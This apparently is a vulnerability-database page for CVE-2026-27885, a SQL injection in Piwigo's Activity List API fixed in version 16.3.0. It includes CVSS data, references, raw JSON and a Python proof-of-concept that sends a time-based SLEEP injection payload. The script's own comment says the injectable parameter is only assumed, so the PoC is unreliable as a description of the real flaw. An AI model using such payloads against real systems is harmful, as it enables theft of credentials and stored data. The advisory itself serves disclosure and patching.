Security Vulnerability Report
CVE-2026-27885 CVSS 7.2 HIGH


Published: 2026-04-03 22:16:26
Last Modified: 2026-04-09 21:15:10

Description

Piwigo is an open source photo gallery application for the web. Prior to version 16.3.0, a SQL Injection vulnerability was discovered in Piwigo affecting the Activity List API endpoint. This vulnerability allows an authenticated administrator to extract sensitive data from the database, including user credentials, email addresses, and all stored content. This issue has been patched in version 16.3.0.

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:* - VULNERABLE
Piwigo < 16.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL and Admin Session
target_url = "http://localhost/piwigo/ws.php?format=json"
admin_cookie = {"pwg_id": "your_admin_session_cookie"}

# Vulnerable parameter in Activity List API
# Assuming 'order' or similar parameter is injectable
payload = {
    "method": "pwg.activities.getActivityList",
    "order": "id ASC; SELECT SLEEP(5)-- ",
}

try:
    response = requests.post(target_url, cookies=admin_cookie, data=payload)
    if response.elapsed.total_seconds() >= 5:
        print("[+] Vulnerability confirmed: Time-based SQL injection detected.")
    else:
        print("[-] Vulnerability not detected or payload incorrect.")
    print("Response:", response.text)
except Exception as e:
    print(f"Error: {e}")
```

References

- https://github.com/Piwigo/Piwigo/commit/c172d284e11eab4a5dbadd2844d26f734d5c8c72 (Patch)
- https://github.com/Piwigo/Piwigo/security/advisories/GHSA-wfmr-9hg8-jh3m (Exploit, Mitigation, Vendor Advisory)
- https://piwigo.org/release-16.3.0 (Release Notes)

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-27885", "sourceIdentifier": "[email protected]", "published": "2026-04-03T22:16:26.173", "lastModified": "2026-04-09T21:15:10.113", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Piwigo is an open source photo gallery application for the web. Prior to version 16.3.0, a SQL Injection vulnerability was discovered in Piwigo affecting the Activity List API endpoint. This vulnerability allows an authenticated administrator to extract sensitive data from the database, including user credentials, email addresses, and all stored content. This issue has been patched in version 16.3.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:*", "versionEndExcluding": "16.3.0", "matchCriteriaId": "3502BA46-5475-47BC-BA8F-F9456A836F1A"}]}]}], "references": [{"url": "https://github.com/Piwigo/Piwigo/commit/c172d284e11eab4a5dbadd2844d26f734d5c8c72", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Piwigo/Piwigo/security/advisories/GHSA-wfmr-9hg8-jh3m", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://piwigo.org/release-16.3.0", "source": "[email protected]", "tags": ["Release Notes"]}]}}
```